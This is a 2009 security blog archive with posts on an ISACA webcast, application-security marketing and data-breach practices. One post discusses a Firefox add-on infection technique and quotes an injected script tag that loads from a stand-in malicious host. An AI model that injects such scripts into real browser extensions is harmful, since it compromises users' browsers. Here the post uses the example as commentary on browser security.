Friday, May 22, 2009
- Date: May 26th, 2009
- Start Time: 11:00am EDT
- General ISACA URL: http://www.isaca.org/Content/NavigationMenu/Members_and_Leaders1/Events3/Webcasts/ISACA_e-symposia_and_Webcasts.htm
- My Topic: "Solving Problems That Don't Exist: Building Better Application Security Practices"
- My Start Time: 1:20pm EDT
In today's enterprise, Web Application Security has come front and center for security managers as well as the business. However, many well-funded, well-backed programs fail, because they miss the fundamental rule of problem solving -- understand the problem. The secret to success is simple -- understand your business context and build a program around that. How can you develop an actionable, business risk-driven program? Understanding your role is key, followed by successful identification of a cornerstone upon which to base the program. This presentation will teach you how to evaluate data value, application visibility and business exposure one step at-a-time and assign real, measurable risk. Participants will be given a strong foundation to succeed, so they don't end up solving problems the business doesn't have.Hope to see you on there! I'll be posting slides from the talk on Wednesday, to the usual SlideShare.net place! I'd love to hear your questions and comments after the talk.
Thursday, May 21, 2009
"I agree, this isn't really novel.
It's an interesting POC, but if I have local access to your file system, there's tons easy ways to own you...
We just don't have systems that were designed to stand up to local access, case closed. An attacker could just as easily modify one of firefoxs own executables or libraries, your proxy settings, etc..."
In the final analysis, at least for me, it doesn't really matter that FireFox chooses to use XUL, which allows for an arbitrary script tag in extension manifest file... although that is a seriously neat trick. What really matters is that the attack surface of FireFox is laid bare through the plug-in/extension architecture which in my humble opinion is fundamentally flawed from a security perspective. It doesn't matter if we sign/encrypt/check-recheck that manifest file for a maliciously injected script src="http://malicious.tld/malicious.js" ... the browser is hosed anyway, long before that.
Wednesday, May 20, 2009
"You can infect one of the installed add-ons, because Firefox isn’t able to verify if an add-on is compromised or not. To do that you only need to edit the file that defines the overlay." --D. Silva
Tuesday, May 19, 2009
Monday, May 18, 2009
Thursday, May 14, 2009
- Social Engineering - Lesson #1, make sure you only pay your waiter! Although this guy was clearly good at playing the disguise the restaurant patrons are just as much at fault for being clueless and not paying attention! Interesting read...
- VISA's Latest Anti-Fraud - The Europeans have figure out credit card fraud pretty well, and are way ahead of us Americans unfortunately - and here's another example. VISA is now introducing a card that goes beyond chip-and-pin with a built-in computer and keypad on the card itself to combat card-not-present fraud. I hope we get them in the 'States before I turn 50... hope they fit well into the wallet?
- Apple's "Big Fix" - Apple released fixes for, get this, 68 security issues. I guess all those ads about Macs "not getting viruses, crashing, ..." are just as full of crap as the rest of the Mac vs. PC war. I think it's time to add up the public vulnerability data for Microsoft and Apple for the year again...
- Minnesota's Capitol "Seriously Vulnerable" - Here's a shocker... Minnesota's Legislative Auditor (who?) released a report that basically said that Capital security was crap. I'm partial to the security doors that were installed... I love random acts of useless security, don't you?
- Adobe's Security Woes - ...and last but certainly not least, in case you've been living in a cave with no Internet, Adobe fixed yet another round of PDF problems recently. Link to the entire slew of advirosies included above... can't wait for the next round.
"...designed to educate system administrators and developers on some common dangers and mis-configurations facing Linux,Apache,MySQL, PHP (LAMP) applications."The great news here is that this is all 100% documented with step-by-step instructions, including the tools you'll need and all the coaching you can stand, all in one handy package. Justin Keane and the folks over at www.LAMPSecurity.org are doing a phenomenal job of bringing these special images to you- so by all means go and use them to your advantage! The only thing you'll need is VMWare player, some time, and your creativity!
Wednesday, May 13, 2009
- UC Berkeley Breach Affects 160,000 (Berkeley link here)
- Data About Students Dispersed in Breach
- Financial Aid Data at KCC May Be at Risk
- Collect and store only the information absolutely needed and no more
- Encrypt personal and private information from students and faculty
- Centralize sensitive data stores and do not distribute this information throughout the school
- Destroy (digitally shred) digital information after a defined retention period
- Carefully limit access to sensitive information via roles and permissions
Monday, May 11, 2009
With all the focus on "usable security" lately I've been going insane trying to figure out how to get products to actually be useful for the common user. I was relatively sure that Kaspersky had things figured out, at least reasonably well, until this happened today. I can't explain it - I don't know what this "unknown application" is (my guess is that installing VMWare 6.5 somehow triggered this) but I do know I really wish there was a terminate process (or at least a DENY button). What am I supposed to click?
Is anyone from Kaspersky reading this? Can you tell me what the hell this is and what I should be doing about it? How do I investigate the root-cause? What if this really IS a keylogger?!
Saturday, May 9, 2009
Thursday, May 7, 2009
Tuesday, May 5, 2009
I haven’t gone on a good rant lately – but it’s high time I let it out because it’s been building like the tension in the Ferrari F1 team. I’ve been keeping a steady eye on the marketing efforts around “security stuff” as the economy has been tanking and I’d like to share with you some observations.
Perhaps in a stable economy, one where we’re not spending our great-great-great-grandchildren’s savings, these observations wouldn’t make me so nuts… but in light of corporate spending habits in such a climate I feel the need to call out these ridiculous happenings.
The crescendo of my madness was earlier today when I walked, errr…hobbled, through Chicago’s O’Hare International Airport slow enough to actually look at some of the signage and billboards. I came up the escalator in Terminal 1 to be greeted by a WatchGuard Firebox ad and immediately I stopped and took note; then I took a picture just so I can have proof of this insanity. After getting through security I was greeted overhead by a giant big-screen style video board running ads for none other than Symantec. Symantec’s ad was a little less upsetting – and unfortunately I couldn’t get a good picture of it in spite of my efforts.
The Symantec ad basically said this … “We protect more corporations, systems and users than anyone else in the world”. I then had a quick flashback to the last 3 big companies I worked at. Not surprisingly Symantec’s logo was all over each one. From dysfunctional desktop firewall/antivirus/anti-malware to a SIM, to some backup software – Symantec was everywhere. I then recalled how much we all (in IT Security) complained that the products were crap and we could barely make it do what we needed it to do, much less what the sales guys had convinced our management it would do. OK so fair enough – for better or for worse, Symantec had protected (or secured if you really stretch the meaning) each one of those enterprises.
Now let me take a minute to address WatchGuard’s “Complete Network Security In One Box” slogan in those big white letters. First off, to you and I the insertion of the word network in that slogan means that it doesn’t actually protect against anything that doesn’t attack at the network layer. The average business-person, however, does not quite see that subtle distinction. They see the WatchGuard ad, and see that they can solve the “hacker problem” by plugging this box in… and nothing else. How do I know this for such a fact? I stood there for a few minutes and asked some random people in business suits. I realize this isn’t a scientific poll – but it’s what I had to work with. Perhaps I’ll make this a little more scientific in the near future if you readers think you want to read more.
Let me get to the point of my rant here for the sake of keeping this relatively brief – I hate few things more than when a vendor sells magic pixie dust. I personally haven’t picked up a FireBox since about spring ’00 when I was working as a consultant and we replaced a few at some SMBs. Not that I personally have anything against the FireBox because I do think that any UTM Firewall is as crappy as the next, but this type of advertising makes me mad as a hatter. I realize full-well that in a contracting economy vendors scrap for as much business as possible, and business is business, but please stop over-selling your products. Also, please realize that the way you advertise impacts not just your business but the entire industry … often negatively. What that WatchGuard ad says to the unsuspecting business owner is “Hey, buy this box and forget about security” – which simply isn’t true! Businesses have web applications, random portable user devices (iPods, etc), and a plethora of other threats that these UTM Firewall boxes simply don’t address. To insinuate that your product is the magic security pixie dust is irresponsible, and actually does more harm than good. …and don’t give me that “But we’re being honest and saying we only cover network security” crap… you know who you’re targeting here and know damn well that your target audience doesn’t understand the difference. And this isn’t just a rant against WatchGuard because their ad was just the latest that caught my attention… this goes for all of your marketing teams that have that stupid “Security. Solved” mentality to your ads – you know who you are.
As a call to action, I urge everyone that sees one of these irresponsible ads – take a picture, post it somewhere… call them out. If we as security professionals continue to allow this madness to seep into our industry – our already confusing talks with business leaders will be even more confusing when we have to tell them their magic red box does nothing to keep their credit card database safe… and that’s not just bad for us – it’s bad for business, period.
…and with that I’ll step off my soapbox, thanks for reading!